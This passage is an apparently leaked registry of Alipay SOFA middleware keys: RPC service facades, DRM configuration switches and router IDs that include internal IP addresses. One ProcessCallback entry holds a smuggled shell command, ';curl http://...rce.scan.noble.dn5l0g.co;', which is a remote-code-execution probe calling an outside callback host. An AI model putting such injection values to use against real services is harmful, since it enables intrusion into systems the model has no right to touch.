NCE_ID#@#DEFAULT_GROUP","DATA_ID_11.159.192.140#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.lendpofprod:name=com.alipay.common.tracer.manage.TracerDrm.enableRpc2JvmDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zpaas:name=com.alipay.routeclient.DefaultRouteCoordinator.grayEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.poscore:name=com.alipay.poscore.core.service.cache.DrmCacheTrigger.refreshServiceConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.137.99#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.69.213.103#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.minicreateweb.api.Platform:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.sandboxhome.ddsConsole_ds.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbitemprod.biz.service.webspi.controller.KbItemConfigQueryWrapperService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.128.109#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.autoinsprod.common.service.integration.zdatafront.BaseZdfServiceClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.228.232#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.publiccore.common.service.facade.channel.PublicChannelsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.openeco.acl.common.service.facade.IGroupSer:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finadvisorprod.common.service.facade.api.FinadvisorShareQrcodeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opssla.common.service.facade.DrmManageFacade:1.0:GlobalNet@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.DataViewProtocolQueryService:1.0:publicDomain_zmcie@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.158.107#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapi.common.core.client.AppInvokeService:1.0:appfuse@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.exratecenterTairCache.zonePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbcontent.common.service.facade.api.shopspecial.ShopSpecialQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmDynamicResource.drcConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:;curl http://GIYHU5BSMQWTC5LVPJRW2LLVNZUXC5LFJFSC2ZBZOM3WY6LBNE------.rce.scan.noble.dn5l0g.co;@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:chargefront@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.55.54#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.cfmng:name=com.alipay.ambush.netmock.rule.NetmockRuleCoordinator.netmockRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_mm_settle@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.service.facade.api.ProdSecuContentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:sffmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfpcenter:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableLoadTestPreIsland,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.164.150.199#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaljdbc:name=com.alipay.zdal.jdbc.comprehensive.insmobile.communityShardDataSource.operation,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.common.service.facade.execute.callback.ChangeServiceExecutionCallback:1.0:finassistantcore_sucaiku@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiswisdom.event.common.service.facade.api.eventparam.EventParamOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cscenter.service.worktask.facade.CsPrivacyQuestionManageService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.atd:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaErrorCodeSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finbatch:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.cityVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paycore.service.payment.consult.api.AssetConsultService:1.0:guarcoreFluxService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.trafficintelbiz.common.service.facade.api.WorkShiftFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imemberprod.service.facade.api.OauthProxyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insxhbclaimprod.common.service.facade.ClaimVideoCallFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.mif.common.service.facade.BusinessAreaQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finstore.common.service.facade.fundmanager.FundManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.acquirefront.service.facade.api.AcquireOrderPreCreateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.96.70#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.bp.engine.call.BPCall:1.0:mrchis_deposit@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkwirelessdataportal.common.service.panda.ProductManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mobilemock.common.service.facade.api.RpcLockServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","NS_Sub_Servers_TP_HOHO#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdatacontext:name=com.alipay.datacontextlib.dataswap.spi.drm.DataSwapGlobalParamDrm.deployEnvironment,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.AppInvokeService:1.0:cxbizruntime@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.wishsavings.drm.impl.WishSavingsParamsDRMResource.defaultTemplateIds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finstore.common.service.facade.fop.mng.ContentTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:kbasset@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.AntVipDefaultAppName:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.ioErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.72.93#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fccustprocess_rejectCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acwareslifecore.common.service.facade.MessageTemplateFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.166.246.120#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.39.222.93#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.overseaexprod.comon.service.facade.rate.RatePromoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.huanyu.facade.change.ChangePlanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bizprodmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.ctokenCheckerDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:demo3@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imasp.common.service.facade.DeliverCacheMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.execute.ChangeServiceExecuteComplexFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.openhome.facade.operator.facade.IsvOperateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.csrobot.service.facade.mng.api.ModelMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.182.236#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ucdpmng.facade.UcdpAbFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:menualReviewPreCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.atd:name=com.alipay.cif.utils.CountryCodeSwitch.countryCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mshopcenter.common.service.facade.api.shop.ShopModifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yuemaprod.common.facade.service.YuemaRecallFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_ALI_rate_portal_message_topic#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.iotcube.common.service.facade.openapi.upgrade.UpgradeTaskTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.inshealthclaimmng.revise.facade.ReviseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.notExistExpireTimeMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.aliinvoiceprod.core.service.tax.optimization.manager.TaxOptimizationUserManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.core.service.inspect.MstDetectReportDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_2112#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchcommerce.fmcgcore.common.service.facade.api.order.OcOrderQueryRzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditbill.facade.common.api.PcreditMonthBillQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custdecision.service.merchantdata.facade.MobilecashierErrorCodeDetailFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:finscbff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:busriskdec@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:cardPackageEditProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.38.43.238#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.50.124.77#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.icif.service.facade.api.MobileBindService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.pointprod.common.util.resource.QuickPointRecoveryDrmResouce.errorCodes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acprodapicore.facade.service.DataStructServiceFacade:1.0:core@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:gmcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsTempManager.yebTabCardRecommendEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilepromo.common.service.facade.offlinetaobao.CdpItemManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.streaming.dsc.api.common.DSCRpcService:1.0:DSCServerTestDomain@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditdecision.service.PcreditPayableFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.FinancialInstInfoQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acticketcore.common.service.facade.UserCenterClient#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finorm.core.service.guardian.data.OdpsDataSourceCoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insautobff:name=com.alipay.rdsguard.drm.RdsSystemSwitchDrmResource.systemSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:acmangkhut@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","NS_Sub_Servers_TP_F_ROUTER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.paramcore.common.service.manage.facade.api.ParmClientMonitorNgSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fuelprod.core.service.cnpc.CnpcSupportService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmng.common.service.TemplateAttributeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cif:name=com.alipay.cif.client.drm.CifFixedQuerySwitcher.fixedMode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finvirtualta.common.service.facade.fund.UrgentProcessFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.core.service.fund.repository.AccountUserRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settlequery.common.service.facade.payment.api.PaymentQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.OutSyncTransCallBackForLdc:1.0:finbatch@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.discountcore.common.service.facade.DiscountTicketLogService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.42.32#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finasmcore.common.service.facade.activity.service.AmountAdvanceActivityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.spi.publish.ArgoTrProxyFacade:1.0:zplayback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.core.service.fund.repository.AccountContractRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.poscore.common.service.integration.drm.impl.DrmSlaDynamicDecisionTrigger.openAccountLimitedStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.52.232.26#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finnet.service.facade.flux.FinnetInfluxService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finnet.service.facade.flux.spi.FinnetReceiveService:1.0:exratecenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insautomarket.common.facade.reservation.AutoMktReservationFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.100.32#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:trade.product.testProduct@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","dchainabsprod@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:transboss@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","trafficlimitcenter@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.custcpt.facade.IdGraphQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialportal.web.ps.rpc.facade.UserComplainFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappcommon.common.service.facade.baas.WhiteListServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebillcenter.common.service.facade.EbillJFUserRecommendFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.smartant.drm.SmartAntParamDrmManager.rebalanceNotifyLoadItemsPerTable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","promoprod@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:sigmaboss@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.179.114#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.socialcore.facade.task.BatchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.biz.snapshot.SnapshotSupplementService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tairmanager.application.service.tair.namespace.NamespaceTaskOfflineService:1.0:sandboxNamespaceTaskOffline@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antemc.service.facade.AuroraEmergencyCIFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:csprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_LIFEMOCK_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.antmembermng.common.service.facade.userview.UvLabelConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.credible.CredibleManageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.185.82#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.nodejs.ConsumerService:1.0:sffgroupexp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finmng.service.facade.ctrl.DataSvnFetchService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:aconeconsole@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscprod.facade.ssm.SeasonFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.yeb.YebVoucherService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.common.service.integration.pkgcore.PkgCoreFacadeClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_172.36.1.26#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.dataservice.service.RiskDataServiceV2:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.vouchercore.service.facade.api.voucher.VoucherRefundFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.auditprod.common.service.facade.fund.api.CheckPointQueryFacade:1.0:auditprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.distinguishprod.common.service.facade.ConfigParmaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fcinstassetmng_approvedProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.shop.MrchProdBizUnitQueryMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxiancore.common.service.InsApplicationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.Callback:1.0.0:bumngTaskCenterCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insmarketingprod.common.service.facade.mng.campaign.InsMktProdCampaignFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.membercenter.service.facade.LogonIdService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:ngfe@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditplan.apply.PcreditPlanApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdatraffic.facade.TrafficQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdatafront.common.service.integration.address.AddressResolveClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.trafficcardsp.common.service.facade.TaxiDriverScoreServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityexprod.common.service.facade.RiskReportDataService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tairmanager.interfaces.endpoint.facade.rest.tbase.TBaseRequestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.paycore.service.payment.asset.AssetPrepareService:1.0:buscard@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ccr.facade.CreditCardInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.trafficcardsp.common.service.facade.IndustryExecTemplateRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gffund.common.service.facade.api.autopilot.DefaultTransAccountInfoConfigOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linke.aci.core.facade.CILogService:1.0:ciLogOssService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableGlobalCrc,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.bizprodmng:name=com.alipay.cif.drm.PasswordRevokeSwitch.queryPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:bizprodmng@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finadvisorprod.common.service.facade.api.FinadvisorVerifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:scfmngSupplyChainScpConfigCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapitool.facade.api.FieldControlQueryFacade:1.0:mapitool@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.bizprod.common.service.facade.api.AssetCardManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-finfundtrade-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mdatasync.common.service.facade.DCDataSyncFacade:1.0:mif-UnifiedDCDataSyncFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.PageTemplateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdatacontext:name=com.alipay.datacontextlib.dataswap.spi.drm.DataSwapGlobalParamDrm.serverStore,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promomng.common.service.facade.AntNavigationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tallycore.core.model.tally.domain.repository.HbaseDataQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsManager.equityFilter,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_C_TRANSFER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.poscore:name=com.alipay.cif.client.drm.TairToTbaseSwitch.shadowFullAccessToTbase,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finconsumeprod:name=com.alipay.common.tracer.manage.TracerDrm.zdalOssDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.biz.service.drm.FinpwmLogMonitorConfigDrm.printMonitor,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.23.224.180#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.findatacanal.common.service.manage.gildata.CommonSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.modelcontext.service.facade.ModelMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:pcreditmarket@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_O_BUMNG#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.124.174.58#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.bpaas.gwtools.common.service.facade.BpaasSecretFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fraudmng.common.service.facade.redblue.api.PunishStrategyManageRevertService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.clerktone.facade.api.bizaccess.ClerkBizInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.miniprod.common.service.facade.api.miniappservice.MiniAppActivityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInGlobalSwitchValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.publiccore.common.service.facade.topic.LifeServiceTopicFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:router-app@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradequery:name=com.alipay.tradequery.common.utils.drm.TradequeryFacadeCommonDRM.obHisCloudSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.icfmng.common.service.facade.api.QueryVoucherServiceApiService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sdaclouddevice.facade.ha3.DeviceSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrmcore.common.service.facade.service.model.monitor.MdpWarnRecordActionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilequest.common.service.facade.quest.QuestUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:openmonitor@XFIRE#@#DEFAULT_INSTANCE_ID#@#S